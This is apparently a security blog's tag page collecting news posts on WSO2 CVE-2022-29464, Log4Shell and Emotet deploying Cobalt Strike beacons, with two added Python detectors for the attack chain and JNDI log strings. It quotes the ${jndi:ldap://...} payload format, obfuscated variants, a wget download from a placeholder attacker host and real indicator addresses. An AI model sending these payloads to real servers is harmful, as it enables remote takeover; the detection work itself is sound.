Cobalt Strike Beacons Archives – Gridinsoft Blog
https://gridinsoft.com/blogs/tag/cobalt-strike-beacons/
Welcome to the Gridinsoft Blog, where we share posts about security solutions to keep you, your family and business safe.
Feed last updated: Fri, 06 Oct 2023 23:40:08 +0000

A WSO2 Vulnerability is Fraught with Remote Code Execution
https://gridinsoft.com/blogs/vso2-rce-vulnerability/
Tue, 31 May 2022 22:04:00 +0000

The products by WSO2, an open-source API, applications, and web services provider, have been attacked in the wild through the CVE-2022-29464 vulnerability detected back in April 2022.

This vulnerability allows attackers to execute malicious code remotely via an unrestricted file upload.

The attack begins with the upload of a web shell as a *.jsp or *.war file, taking advantage of CVE-2022-29464. Once the web shell is installed, the attacker uses it to run arbitrary commands through the server's Java process.


Scheme of the attack. Image: Trend Micro

The attack results in the installation of a coin miner and a Cobalt Strike beacon (a backdoor). The cryptocurrency miner is installed via a wget command launched from the Java process, which fetches the auto.sh file (the miner itself). In the meantime, another part of the attack also runs through the web shell: the Java process calls chmod to make a file named “LBcgqCymZQhm” executable and then runs it. That process establishes an outbound connection to 179[.]60[.]150[.]29:4444, an address earlier tracked as involved in numerous Cobalt Strike attacks. The LBcgqCymZQhm process is therefore a Cobalt Strike backdoor beacon.
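
As an added example (not code from the post or from Trend Micro), the detection logic below walks constructed process and network telemetry for the chain just described: a Java parent (the WSO2 server) whose children run a wget download and a chmod, followed by a child that connects outbound to the reported 179.60.150.29:4444. The attacker host and all telemetry records are constructed.

```python
from collections import defaultdict

# Constructed process/network telemetry for this example (not from the post).
# Record layout: (event_type, pid, ppid, image, detail). The attacker host is a
# placeholder; the 179.60.150.29:4444 destination is the one reported in the post.
EVENTS = [
    ("process", 1200, 1, "java", "-jar wso2server"),
    ("process", 1301, 1200, "sh", "-c wget http://[attacker-host]/auto.sh -O /tmp/auto.sh"),
    ("process", 1302, 1200, "sh", "-c chmod +x /tmp/LBcgqCymZQhm"),
    ("process", 1303, 1200, "/tmp/LBcgqCymZQhm", ""),
    ("network", 1303, 1200, "/tmp/LBcgqCymZQhm", "179.60.150.29:4444"),
    ("process", 1400, 1200, "sh", "-c ls /tmp"),   # benign child, gets no tag
    ("network", 1500, 1, "sshd", "10.0.0.9:22"),   # unrelated process, ignored
]

DOWNLOADERS = {"wget", "curl"}
C2_PORTS = {4444}   # port used by the beacon in the post; extend with your own list

def tag_java_children(events):
    """Collect, per Java parent, the stages of the chain seen among its children:
    'download' (wget/curl), 'chmod' (permission change), 'c2_connect' (outbound to a C2 port)."""
    java_pids = {pid for ev, pid, _, image, _ in events if ev == "process" and image == "java"}
    tags = defaultdict(set)
    for ev, pid, ppid, image, detail in events:
        if ppid not in java_pids:
            continue
        words = set(detail.split())
        if ev == "process" and words & DOWNLOADERS:
            tags[ppid].add("download")
        if ev == "process" and "chmod" in words:
            tags[ppid].add("chmod")
        if ev == "network" and int(detail.rsplit(":", 1)[1]) in C2_PORTS:
            tags[ppid].add("c2_connect")
    return {ppid: sorted(t) for ppid, t in tags.items()}

def flag_web_shell_chains(events):
    """Return the Java parents whose children show all three stages of the chain."""
    return [ppid for ppid, t in tag_java_children(events).items()
            if {"download", "chmod", "c2_connect"} <= set(t)]

if __name__ == "__main__":
    print(flag_web_shell_chains(EVENTS))
```

Any one stage on its own (a wget from a Java process, say) is a weak signal; the chain of all three under one Java parent is what makes the finding worth paging on.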

The most interesting detail is that the Cobalt Strike beacon, originally designed for Windows, was found running on Linux in these attacks. That means the attackers deliberately worked on the backdoor's compatibility with Linux.

The vulnerable software includes WSO2 API Manager 2.2.0 and above, Identity Server 5.2.0 and above, Identity Server Analytics 5.4.0 to 5.6.0, Identity Server as a Key Manager 5.3.0 and above, Open Banking AM 1.4.0 and above, and Enterprise Integrator 6.2.0 and above. Patches are already available, so all users of the listed products are advised to apply them as soon as possible.

WSO2's many customers span a wide range of industries, including critical ones such as healthcare, finance, energy, education, communications, and government. Needless to say, should attackers exploit CVE-2022-29464 against unpatched systems, the consequences could be severe.

Experts are already fixing attacks on the Log4Shell vulnerability
https://gridinsoft.com/blogs/attacks-on-the-log4shell-vulnerability/
Tue, 14 Dec 2021 20:44:48 +0000

Security researchers are already scanning the Internet for products affected by the dangerous bug in the Log4j library and are remediating the results of attacks on the Log4Shell vulnerability.

The vulnerability is already being exploited to deploy miners, Cobalt Strike beacons, etc.

An issue in the popular Log4j logging library, part of the Apache Logging Project, was reported last week. The 0-day vulnerability received the identifier CVE-2021-44228 and scored 10 out of 10 on the CVSS scale, as it allows remote arbitrary code execution (RCE).

The problem is aggravated by the fact that PoC exploits have already appeared online, and the vulnerability can be exploited remotely without advanced technical skills.

The vulnerability is triggered when a Java-based application or server that uses Log4j logs a specially crafted string. When Log4j processes that string, it performs a lookup that makes the vulnerable system load and run malicious code from a domain controlled by the attacker. The result is a complete takeover of the vulnerable application or server.

As a reminder, the fix has already been released as part of Log4j 2.15.0.

The attacks on Log4Shell have already begun, Bleeping Computer now reports. According to the publication, to exploit the bug an attacker can change the User-Agent header of their browser and visit a site, or submit a search string on the site, using the format ${jndi:ldap://[attacker_URL]}.

That string ends up as a line in the web server's access logs, and when the Log4j-based application processes the line, the lookup forces the server to make a callback to the URL specified in the JNDI string. Attackers can then use this callback to deliver commands to the vulnerable device (either Base64 encoded or as Java classes).

Worse, simply observing whether that callback connection arrives is enough to determine whether a remote server is vulnerable to Log4Shell.

It is reported that attackers are already using Log4Shell to execute shell scripts that download and install various miners. In particular, the group behind the Kinsing malware and the botnet of the same name is actively abusing the Log4j bug, using Base64 payloads that force the vulnerable server to download and execute shell scripts. The script removes competing malware from the vulnerable device and then downloads and installs Kinsing, which starts mining cryptocurrency.

In turn, Chinese experts from Netlab 360 warn that the vulnerability is being used to install the Mirai and Muhstik malware on vulnerable devices. These IoT threats make compromised devices part of botnets, use them to mine cryptocurrency, and conduct large-scale DDoS attacks.

“We received the first responses from our Anglerfish and Apacket honeypots, which recorded two waves of attacks using the Log4j vulnerability to form botnets. A quick sample analysis showed that they were used to form the Muhstik and Mirai botnets. That is, in both cases, they were aimed at Linux devices,” the experts say.

According to Microsoft analysts, the Log4j vulnerability is also being used to drop Cobalt Strike beacons. Cobalt Strike is a legitimate commercial tool created for pentesters and red teams and focused on exploitation and post-exploitation. Unfortunately, it has long been a favourite of attackers, from state-sponsored APT groups to ransomware operators.

So far there is no confirmed evidence that ransomware groups have adopted a Log4j exploit. Still, according to experts, the deployment of Cobalt Strike beacons indicates that such attacks are inevitable.

In addition to using Log4Shell to install malware, attackers are using the bug to scan for vulnerable servers and obtain information from them. For example, a scanning payload can force vulnerable servers to access URLs or perform DNS lookups for callback domains. This allows both security researchers and attackers to determine whether a server is vulnerable, whether for future attacks, for research, or to claim a bug bounty from its owner.

Journalists are concerned that some researchers may go too far by using the exploit to exfiltrate environment variables containing server data, including the hostname, the username the Log4j service runs under, and the OS name and version.

The most common domains and IP addresses seen in these scans are:

  • interactsh.com
  • burpcollaborator.net
  • dnslog.cn
  • bin${upper:a}ryedge.io
  • leakix.net
  • bingsearchlib.com
  • 205.185.115.217:47324
  • bingsearchlib.com:39356
  • canarytokens.com
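
As an added example (not code from the post or from Bleeping Computer), the detector below runs over constructed access-log lines and flags the ${jndi:...} lookup format described above. It first resolves the ${upper:x} and ${lower:x} lookups that attackers use to split the keyword, as in the bin${upper:a}ryedge.io entry in the list, and URL-decodes request paths. All log lines and hostnames are constructed.

```python
import re
from urllib.parse import unquote

# Constructed web-server access-log lines for this example (not from the post).
SAMPLE_LOG = """\
10.0.0.5 - - [10/Dec/2021:12:00:01 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.6 - - [10/Dec/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://callback.example.test/a}"
10.0.0.7 - - [10/Dec/2021:12:00:03 +0000] "GET /?q=${${lower:j}ndi:ldap://bin${upper:a}ryedge.example/x} HTTP/1.1" 404 0 "-" "curl/7.68"
10.0.0.8 - - [10/Dec/2021:12:00:04 +0000] "GET /search?q=jndi HTTP/1.1" 200 100 "-" "Mozilla/5.0"
"""

# Single-character ${upper:x} / ${lower:x} lookups, as in bin${upper:a}ryedge.io
CASE_LOOKUP = re.compile(r"\$\{(upper|lower):([^${}])\}", re.IGNORECASE)
# A resolved JNDI lookup: the scheme and the callback host the server would contact
JNDI = re.compile(r"\$\{jndi:([a-z]+)://([^/${}\s]+)", re.IGNORECASE)

def normalize(text):
    """URL-decode, then resolve case lookups to a fixed point so a keyword split
    across nested lookups (e.g. ${${lower:j}ndi:...}) becomes the literal ${jndi:."""
    text = unquote(text)
    prev = None
    while prev != text:
        prev = text
        text = CASE_LOOKUP.sub(
            lambda m: m.group(2).upper() if m.group(1).lower() == "upper" else m.group(2).lower(),
            text)
    return text

def scan_log(log_text):
    """Return one finding per JNDI lookup in the log: line number, scheme and callback host."""
    findings = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        for m in JNDI.finditer(normalize(line)):
            findings.append({"line": lineno, "scheme": m.group(1).lower(),
                             "host": m.group(2).lower()})
    return findings

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"line {f['line']}: JNDI lookup via {f['scheme']} to {f['host']}")
```

The plain word "jndi" in a search query (line 4) is not flagged; only a lookup that survives normalization is, and the extracted host is what you would check against the callback domains listed above.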

Emotet now installs Cobalt Strike beacons
https://gridinsoft.com/blogs/emotet-now-installs-cobalt-strike-beacons/
Thu, 09 Dec 2021 19:44:50 +0000

Researchers warn that Emotet now installs Cobalt Strike beacons directly on infected systems, giving attackers immediate access to the network. They can use that access for lateral movement, which will greatly facilitate extortion attacks.

As a reminder, Emotet usually installs TrickBot or Qbot on victims' machines, and that malware in turn deploys Cobalt Strike and performs other malicious actions. Now the Cryptolaemus research group has warned that Emotet is skipping the TrickBot or Qbot stage and installing Cobalt Strike beacons directly on infected devices.

Cryptolaemus is a group of more than 20 information security specialists from all over the world, who united back in 2018 for a common goal – to fight against Emotet malware.

This information was confirmed to the journalists of Bleeping Computer by the specialists of the information security company Cofense.

“Some of the infected computers were instructed to install Cobalt Strike, a popular post-exploitation tool. Emotet itself collects a limited amount of information about the infected machine, but Cobalt Strike can be used to evaluate a broader network or domain assessment, looking for suitable victims for further infection, such as ransomware,” the experts say.

“Cobalt Strike was trying to contact the lartmana[.]com domain, and shortly thereafter Emotet was deleting the Cobalt Strike executable.”

In practice, this means attackers now have immediate access to the network for lateral movement, data theft, and rapid ransomware deployment. The direct deployment of Cobalt Strike is expected to speed up ransomware deployment on compromised networks as well.

“It is very serious. Usually, Emotet will drop TrickBot or QakBot, which in turn will drop Cobalt Strike. In a normal situation, you have about a month between the first infection and the extortion. With Emotet dropping CS directly, this delay is likely to be much shorter,” security specialist Marcus Hutchins warns on Twitter.

Cofense experts, in turn, report that it is not yet clear whether this is a test by the Emotet operators themselves or part of an attack chain belonging to another malware family that cooperates with the botnet.

“We do not yet know if the Emotet operators intend to collect the data for their own use, or if it is part of a chain of attacks belonging to one of the other families of malware. Given the quick removal, it could have been a test, or even an accident,” the experts summarize, promising to continue monitoring.

As a reminder, I also reported earlier that the Emotet Trojan tries to spread through available Wi-Fi networks.
